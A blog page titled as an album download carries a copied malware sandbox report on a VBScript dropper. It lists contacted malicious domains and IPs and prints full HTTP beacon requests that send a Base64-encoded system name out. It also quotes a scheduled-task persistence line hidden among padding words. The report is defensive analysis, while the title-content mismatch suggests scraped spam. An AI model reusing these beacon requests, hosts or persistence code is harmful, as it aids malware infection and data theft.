Skip to content Skip to sidebar Skip to footer
Home / Eviscerator Slaves To A Discordant System Download

Eviscerator Slaves To A Discordant System Download

Post a Comment

Incident Response

Risk Assessment

Network Behavior
Contacts 5 domains and 5 hosts. View all details

MITRE ATT&CK™ Techniques Detection

This report has 3 indicators that were mapped to 6 attack techniques and 5 tactics. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

  • External Systems
    • Detected Suricata Alert
      details
      Signature details suppressed, as ETPro rules matched and display has been disabled. Please see the Emerging Threats section for more information.
      source
      Suricata Alerts
      relevance
      10/10
    • Sample was identified as malicious by at least one Antivirus engine
      details
      3/59 Antivirus vendors marked sample as malicious (5% detection rate)
      source
      External System
      relevance
      8/10
  • Network Related
    • Malicious artifacts seen in the context of a contacted host
      details
      Found malicious artifacts related to "37.9.175.9": ...

      URL: http://gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 5/76 scanned on 03/26/2020 18:53:38)
      URL: https://app.jtrbot.com/ (AV positives: 1/76 scanned on 03/26/2020 14:52:45)
      URL: http://topfest.sk/misc/farbtastic/css/login/customer_center/customer-IDPP00C149/myaccount/signin (AV positives: 5/76 scanned on 03/26/2020 07:10:23)
      URL: http://zeleneatrium.sk/media-o-nas/v-trnave-rastie-slovensky-unikat/engine1/style.css (AV positives: 1/76 scanned on 03/25/2020 15:16:10)
      URL: http://zeleneatrium.sk/priebeh-vystavby/fotogaleria/2014-august/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/style.css (AV positives: 2/76 scanned on 03/24/2020 15:21:44)
      File SHA256: 72ec27bd0d959a1e6713d96b4e55c5a9b92ac6d1b5b5a4a8d5d1211422fcee57 (AV positives: 1/73 scanned on 03/09/2020 11:39:35)
      File SHA256: 92bff682e991c90a5500a0eb271a435bc3dcbda30cd82a620151351f9c3ac23f (AV positives: 30/74 scanned on 01/02/2020 17:10:11)
      File SHA256: bc48f37f3f29877d90cfbd99caf277460c625400f5984682c606a57ff0a62eb6 (AV positives: 32/73 scanned on 12/18/2019 14:21:05)
      File SHA256: f4b2e4dcd3bc664b38e5de5783448b2d1c60469265d7609e6bc60139f8eb0c5b (Date: 12/18/2019 09:26:00)
      File SHA256: 6f4ca7801ac1439bc13560e644c957e24a25159725920b74abf5bdc9898df475 (AV positives: 14/74 scanned on 12/09/2019 12:20:07)
      File SHA256: 81e366b6105440fa9ca1304ea27ea5f00e4c9d5ca8b7f8ce4a5204b195fc1836 (Date: 11/20/2019 04:03:47)
      File SHA256: d6e230c786755a00ea6d3886e556349c1f154eb9338b7f908f564dfe4a2486ce (Date: 11/20/2019 04:03:31)
      File SHA256: a8c56d50c351156f03278bef850b74254fd9f71877c49ceb85355a36a8f93114 (Date: 11/20/2019 04:03:12)
      File SHA256: 02eaf63fc74516b3dc235e4227fd79317b852c36b6828b5675db51881e20489d (Date: 11/20/2019 04:02:33)
      File SHA256: e1e36b609ea094e304435ec4f82ef63c504e313aef9fbc26609b13e11d6fde98 (AV positives: 11/72 scanned on 11/14/2019 09:43:39)

      source
      Network Traffic
      relevance
      10/10
  • Hiding 1 Malicious Indicators
    • All indicators are available only in the private webservice or standalone version
  • Anti-Reverse Engineering
    • Possibly checks for known debuggers/analysis tools
      details
      "got bipennate nonspore-forming exostrae pyrrolic lamenters Plutella 'denticete mammondom Chavin will-strong Corbeil unseason registrated paneulogism stabilising impressionary Corcovado rumenocentesis anabathmoi dearsenicize nonblamable armhoop non-Bolshevism diglottism copolymerism unsinuated stylopodium bryonin enacts Embiodea webbier zoolitic Anaxibia coinfinity lavament kilts gainset mammati booby out-of-the-world explanatoriness Terrilyn otoblennorrhea catfight nonresisting terrestriality kingless Phobus bridgeway sericiculturist disenamour twice-affirmed incorruptibleness blinkingly sport-starved Reta disdainfully scrivellos noctambulant rei lymphotomy dyemaker Jackelyn Q-celt gastroenterocolitis syringes dephlegmatize racketlike folkways clerkliest telosynapsis elementalist Pentacrinus codirectional chastely heart-angry analysts petromyzontoid joineries repeatedly clipped heterometric shaggy-leaved hair-line high-blooded remonetizes Norwell Whitestown aphorising nutty-flavored bullaces applanation vacat" (Indicator: "ntice")
      "idobranchia gargarism cigarillo Prasad Peridineae conjuration rainstorms semisolemn DOB Millur unassuasive Purlear shelled greenhouses noncompressibility Ahders multiciliated pre-expend verminate antiferromagnetism Dillwyn Tennies tangency amicicide Narrows nonchangeably kongsbergite staunching approving missises recircled internuptial apomixis deurbanize ookinete Minitari evergreens coots jousters chondroprotein pseudosperm uncheating stabilised horologies ungulae Aosta insinking ecclesiasticize accented bacillus liableness kludge macrolinguistically lutarious equitist reptant dissimilarly underhonest buaze thecitis restorers analogies sheepstealer cojudge gold-fish supplicant Carabus chiotilla anticentralist archisynagogue bajulate amylophosphate leucocholic acetylbenzoic hyperdelicately nondiscoveries monofuel tachytely socman Anti-serb levance tasteableness melene BiblHeb dallyman" (Indicator: "ntice")
      "AUmweWGQsPdwdKciTXyfcq=RGB(207,29,28)'Sam. aircoach Safavid Jarreau improvingly restricted alimentary nontransposing reconcilingly encyclopaedically berede Nantua gadwall xanthochroia anepigraphic synclinorium sissoo punctual sporangial scalps vine-covered dehydrosparteine slubbered targets stannites constituted gray-bordered foregleam sloughier crowsteps flap undersoul reget enticer Chroococcus selenography tales unpardon remedies kneaded viatica overblind modal quintaten ryme tri-mide bimbos antimacassars eutectoid countryish schmelze micturation waky encaustic dagswain limbec Selangor hydromyelocele Memnonian Fariss cardiological sympathoblast Elvine gelatinousness traversion Erlond barragan deorbits gimmie quinotannic forjudgment fastly Courtelle rank-minded sciaeniform Nishinomiya enervation gasteromycete thick-thronged gaffing reswill silverfin tallow-white Hinduized K-meson Owego tragus mohnseed nonnotification Xenomorpha twirly CRTC antiaggressionist caplins bawdstrot winners trigging slashed coffee-f" (Indicator: "ntice")
      "ulmarus Banderma nourishingly overdeliberated viscoscope Leibnitzian punches ent sentition unescapable aftertreatment toad-swollen
      XZyxIqsLFKSpujfqnBWjaE=Cos(XZyxIqsLFKSpujfqnBWjaE)'pachycephal sesquipedality phocaenine intracommunication unfragrantly heelwork ISV donnism plumose jacanas creese lenticels prenominating NHA Mowbray paraffinizing factitive hypermoralistic overcaptious Ricinulei subradiative relatum linkeditting flugel noncallable limp derning hypnophoby handwritten guns Serbo-bulgarian despatch pungey osmolal trappers tame-lived Kaffrarian flambant Humphreys meson flawless Kingman valetudinarium horseheel coenobiod Petrolia nonets gardebras throned tyrocidine bromizer vakkaliga SARTS impress knots prediscourse Barnabite difunctional besugar biotite syntropic talookas pyre Fresison noncompulsorily tuftily plimsolls Medit unleisuredness discal Hejazian Chaco tubings merogamy discreditability GRS Dieterich Saylor disenfranchisements slap-bang desolative richen imperishable envenom auxiliatory in-f" (Indicator: "ntice")
      "XZyxIqsLFKSpujfqnBWjaE=Cos(EBNasOvCMSDsrYGMtPkvGSehSxO)
      'gauzily oversocialized smoky unenrobed memorys Robertsville intice bijections self-importance blesbuck spirit-sinking caridean phloxes stratifying hematinuria Zim outride thunder-cloud whinge toadpipes teachy shopwindow unmerchantable balow epiphytous documentations exaggeratory decempartite moto- Ahearn originated larcinry choke-bore staves Amatsumara throwster Yatesboro Fourier nymphly libelled Esd. Messapic epicyte basss vine-clad gastroscopic Kongolese disservices Fuquay birdbaths passagio unlovably subrepand expositional dysgonic latening lymphocytic azotises alodification jutty optionor dys Bastard Veblenite Wampum paneity abwatts Eosaurus y-pointing pseudopodian out-of-dateness mechanicality prehexameral Bernhard enfect trypanolysis encheat slaky side-door respite downiness McDade wash-pot andesytes slaveless diffusional Sephardim counterpaly anecdotalist Harveyville slip- mugfuls tweezed across-the-board Pachydermata nakhod playmate pangen nettl" (Indicator: "ntice")
      "'margravely pannum auto-inoculable unpreternaturally pulsated disenvelop prefecture field-work nonspectacularly white-ground noncruciform arterionecrosis owning Taegu ultrasimian Lalland kowtow unawkwardly Dorris passively mammillar nayword Dilworth strapness postdiastolic spatuliform dumbheaded brandade reests annalist brutalitarian full-figured auriculovertical misthrowing openmouthedly conticent interposer twenty-cubit knacky oxyphony retromammillary upcutting seakindliness posters murres refueling Seaman catechetic samariums reducent helide Swissess demonstrativeness bypassing kickbacks effusions Sphaerobolaceae red-baiting Ceyx magico-religious immotive nonexhortatory spiny-finned unmentionably devours retailers feudality hard-featured strophes destination reinvade stovies Pro-scandinavian resins heathery beachie subterraneal bordel hatemonger Alcestis amsel preendeavor Ojibwa uncontentious dhunchee superenthusiastic pay- nonparticipating horseshoers proparent ultrafilterable pounder spoon specificly" (Indicator: "ntice")
      "ly resplice tetrasyllabic multispicular Desmidiaceae genteeler pharisaical graciosos Vincents yabble Post-petrine reflationism chiding novarsenobenzene DiGiangi epiboulangerite withdrawingness meiotaxy Hessen-Nassau adjudications anticephalalgic unassaultable fogscoffer pagiopod zoophysical osculatrix newsmongering axlike Acnida allophyle diarize Widener Indianola ornoite Prairial kangla islandless impart Tortricidae canonizant intersexuality similor sermonolatry forthcome expectations scissorbird costal medics promiscuities bayz faticableness slate-cutting petalodont PST overdevotedly sperage Gevaert Pandareus Sarona unwrecked datamation defluvium deflagrable Linguatulina experientialist faction hoolock Ignacio supererogatory 'organelles Erminie mosshead Germana Piman vitellogenesis Prado inhabitativeness nonebulliently nondemand chrysophanic abiogeny cellulicidal poplitaeal retromingent dezincification grieving bi-ischiatic Vas calesas delouses disboweled divinizing Heinrick estradiot bloodnoun smooth-core" (Indicator: "ntice")
      "parises inspirator thionine oversilver antiorthodoxly parasithol urophaein sant Croteau Factice Anti-scripturist undissuade Sigfrid Alika undersetter superenthusiasms hypovanadic uncanonicity polyglottally Bellona self-admirer nonobjectivist tunny rough-furrowed 'nonoptic petit-maltre redecorating tsoris McMurry pococurantic balletically millstones uneffeminately re-edificate purulences postically unintegrable macroplastia ill-minded Geary bidactyl sitiophobia hyoides ridicules nonuniformity cystocarpic prepping rusma radiocalcium chawle intermammillary neuromimetic prenoting sandblast calculatedly thymate futhork Aomori Annatol subproctorship bowerly Mentone unomitted stylistics crystalligerous Eustacia galactase bull-god kistful Sterna vinagron gutweed confessions psiloses spouse gaur stinter anatase lenticels Post-elizabethan speron Arretine funli antiknock paradidymis intrudingly intarsias Anthophoridae syncopations milk-warm Spanioli lithochromography beclown secessions Triceratops incuse mandua raffias" (Indicator: "ntice")
      "n nonfuroid prentice voled gravenesses dog-legged wambles Monnet huskershredder camouflaged unspilled qere aeroperitoneum neuroleptanalgesic untolerable abduced Bang Derwin loose-jointed undampened
      xPaJAHbZhdozFmtiEPKQymBC=fr.RegisterTaskDefinition("lxFpMklxDuHMrHXQlTWyNELZIuzk",td,6,,,3)
      'karmouth signorina underabyss seeresses underruler pseudofever chirr epidermoid prepsychology cumberlandite transversality mayfishes troll-drum mantlepiece postilion falsehood-free pseudomoralistic drumbling piking dewdropper hootch purfle Baileyton clotted heave-shouldered phrasable Barcelona Leibnitz actinograph Orcas reobtains Canamary re-rejoinder gib-head rheologies perspires hedged-in gliss barley-hood hog Vannevar lamellar Bartelso somma silicomanganese Hunnian significances festing deaf-and-dumb choosiness Opiliaceae nemoricolous Triturus gongman formular Alakanuk fishwife quackisms vicar heartburns oscillatively winegrowing earlship rebear spermist politicoes antischolastically preopen porphyrogeniture Temesvar st" (Indicator: "ntice")
      "nrestored mannire JPL dudeens dermatomycosis gasometer antisuffrage expiatoriness unfatalistically phosphid drachms Gnosticising firm-framed nitrophenol gasking six-foot queen-of-the-prairie Antony-over Viverridae baroni alunites matronliness nimious Prentice Metabus gobony reboarding out-of-the-way dolman graymalkin monocarpian protended wishmay breechloading Elmdale reconquer berry-formed unsworn landmil approachable Hussitism roentgeno- uncordialness winetasting tachometric prefects Brandt Slocum passifloraceous axiferous moocher Tagaur flaser instrengthen quadrigamist transfer puninesses hepaticogastrostomy self-justifying odont- unthrobbing Skilken Khila" (Indicator: "ntice")
      "power-operated seminervousness hydrocinnamoyl samek Bor Tenstrike misjudge decapitalization pakistanis unhorizontal womanmuckle surtax siglarian gouty simoniacally Burwell pseudapostle collectives formalizer Aesopic spool-shaped malduck hexapodic obscuration Icel Salvationist Riccius illuminato malacoid deodate pratfalls fascisms amounted millihenrys 'sadhana nonconfederate Goura stopwork Bogarde bloviates throw- lyricism interestless Jonme Roncesvalles surprizal Isabelita petrosilex ataman Moyers ichthyological gams no-ball Paignton pencil-shaped corneas wavelessness Pteridospermaphyta O.S. lightfooted undampened orientationally pimiento Baining voetsek salubrity godsons orchiectomy Marty bashing unpoeticised peakward ponticello naiadaceous re-exportation bucare isobar Kim thermotherapeutics thriftiness anatomisable counter-evidence unrespected Hyginus otium amygdules planets epithelize phenylene microsurgical counterproductivity Holderlin Schoharie rackets suspicionful Stigler coal-pit disvisor dissoul Fai" (Indicator: "ntice")
      "'gauzily oversocialized smoky unenrobed memorys Robertsville intice bijections self-importance blesbuck spirit-sinking caridean phloxes stratifying hematinuria Zim outride thunder-cloud whinge toadpipes teachy shopwindow unmerchantable balow epiphytous documentations exaggeratory decempartite moto- Ahearn originated larcinry choke-bore staves Amatsumara throwster Yatesboro Fourier nymphly libelled Esd. Messapic epicyte basss vine-clad gastroscopic Kongolese disservices Fuquay birdbaths passagio unlovably subrepand expositional dysgonic latening lymphocytic azotises alodification jutty optionor dys Bastard Veblenite Wampum paneity abwatts Eosaurus y-pointing pseudopodian out-of-dateness mechanicality prehexameral Bernhard enfect trypanolysis encheat slaky side-door respite downiness McDade wash-pot andesytes slaveless diffusional Sephardim counterpaly anecdotalist Harveyville slip- mugfuls tweezed across-the-board Pachydermata nakhod playmate pangen nettle-tree contrabandista penitentiary" (Indicator: "ntice")
      source
      String
      relevance
      2/10
  • External Systems
    • Found an IP/URL artifact that was identified as malicious by at least one reputation engine
      details
      3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
      2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
      3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
      2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate)
      source
      External System
      relevance
      10/10
  • Installation/Persistance
    • Executes a visual basic script
      details
      Process "wscript.exe" with commandline ""C:\MSG_111188.vbs"" (Show Process)
      source
      Monitored Target
      relevance
      10/10
    • Loads the task scheduler COM API
      details
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 02670000
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FA850000
      source
      Loaded Module
      relevance
      5/10
      ATT&CK ID
      T1168 (Show technique in the MITRE ATT&CK™ matrix)
  • Network Related
    • Sends traffic on typical HTTP outbound port, but without HTTP header
      details
      TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
      TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
      TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header
      source
      Network Traffic
      relevance
      5/10
  • General
    • Contacts domains
      details
      "hotdsk.com"
      "kitaair.com"
      "gdpronline.sk"
      "a.8xcornwall.com"
      "www.kitaair.com"
      source
      Network Traffic
      relevance
      1/10
    • Contacts server
      details
      "173.249.60.219:80"
      "46.16.91.179:80"
      "46.16.91.179:443"
      "37.9.175.9:80"
      "77.104.140.85:80"
      source
      Network Traffic
      relevance
      1/10
    • Loads the .NET runtime environment
      details
      "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at EB430000
      source
      Loaded Module
    • Overview of unique CLSIDs touched in registry
      details
      "wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
      "wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
      "wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
      "wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
      "wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
      "wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
      "wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
      "wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
      "wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
      "wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
      "wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
      "wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
      "wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
      "wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
      "wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
      "wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
      "wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
      source
      Registry Access
      relevance
      3/10
  • Installation/Persistance
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
      "wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
      "wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
      "wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch"
      source
      API Call
      relevance
      7/10
  • Network Related
    • Found potential URL in binary/memory
      details
      Heuristic match: "hotdsk.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: hotdsk.com"
      Heuristic match: "kitaair.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: kitaair.com"
      Heuristic match: "gdpronline.sk"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: gdpronline.sk"
      Heuristic match: "a.8xcornwall.com"
      Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: a.8xcornwall.com"
      Pattern match: "www.kitaair.com"
      source
      String
      relevance
      10/10
    • HTTP request contains Base64 encoded artifacts
      details
      "Microsoft Windows 7 Professional "
      source
      Network Traffic
      relevance
      7/10
      ATT&CK ID
      T1132 (Show technique in the MITRE ATT&CK™ matrix)
  • Spyware/Information Retrieval
    • Found a reference to a known community page
      details
      "ss generalship eloign west-facing Kreiner abdicating unsummered preauthorize rehoning ichorrhemia twittery Esta Redmon russet-green rituality reastonish cryptorrhetic illatives refacilitate consulter nasiform lithotomical Iey decivilize condemnations choicely coynye chador paleocrystallic TUNIS 'Cissus white-dough unneedfulness diskography nepionic embreathe rummagers venogram corporationer N.C. intersetting pulpit jef gluemaking atimon anagrammatist vividnesses de-emphasize uncoking Teach sacra fleetest dust-soiled factuality choledochotomies rodlike redocked Cetraria communistic galleriies insuavity toppling ditheism ticket-printing legalistic leafhoppers lascivious porthouse copernicans Hydrophyllaceae epaulet quintette epidermose photoflash zoomed darr megacycles uncensoriousness supernuity Vespa tobogganer alodiary cuspids aggregato- presystematic blathers thickening sawmill microcodes kirn counternaiant pretabulated outtrick emboltement piedmontal rupicoline hemiramph rememberability cawney Tharsis Elec" (Indicator: "twitter")
      source
      String
      relevance
      7/10
  • Unusual Characteristics
    • Installs hooks/patches the running process
      details
      "wscript.exe" wrote bytes "40130000" to virtual address "0xFC848478" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFC8485A4" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B7403" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B755E" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B7480" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFC848468" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B77AA" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "40130000" to virtual address "0xFC848538" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFD141748" (part of module "WS2_32.DLL")
      "wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF28B7A25" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF28B7A60" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "48b86013fef3fe070000ffe0" to virtual address "0xFC831340" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "401383fcfe070000" to virtual address "0xFC84FE48" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "eb11c366669066669066669066669066669090" to virtual address "0xF28B5BC0" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "001083fcfe070000" to virtual address "0xFC84FB50" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "401383fcfe070000" to virtual address "0xFC84FB10" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B760D" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "48b81016fef3fe070000ffe0" to virtual address "0xFC831000" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "669065488b0425a0150000c366669066669090" to virtual address "0xF28B5B40" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B75B3" (part of module "MSCORWKS.DLL")
      source
      Hook Detection
      relevance
      10/10
      ATT&CK ID
      T1179 (Show technique in the MITRE ATT&CK™ matrix)

File Details

All Details:

MSG_111188.vbs

Filename
MSG_111188.vbs
Size
957KiB (979524 bytes)
Type
script vbs
Description
ASCII text, with very long lines
Architecture
WINDOWS
SHA256
5544009fff7f6facae80efa26d123e24a021c0bddeeda8efdee80e8d288819b2 Copy SHA256 to clipboard

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 1 process in total.

  • wscript.exe "C:\MSG_111188.vbs" (PID: 3160)

Network Analysis

DNS Requests

HTTP Traffic

Suricata Alerts

ET rules applied using Suricata. ETPro rule matches (4 total) are hidden and available in the private webservice or standalone version.

Extracted Files

No significant files were extracted.

Notifications

  • Although all strings were processed, some are hidden from the report in order to reduce the overall size
  • Enforcing malicious verdict, as a reliable source indicates high confidence
  • Network whitenoise filtering (Process) was applied
  • Not all Falcon MalQuery lookups completed in time
  • Not all sources for indicator ID "api-55" are available in the report
  • Not all sources for indicator ID "hooks-8" are available in the report
  • Not all sources for indicator ID "registry-72" are available in the report

Source: https://www.hybrid-analysis.com/sample/5544009fff7f6facae80efa26d123e24a021c0bddeeda8efdee80e8d288819b2/5e7d1c3c9d78e538b401e802

Posted by: oscarprefontainee0193133.blogspot.com

Post a Comment for "Eviscerator Slaves To A Discordant System Download"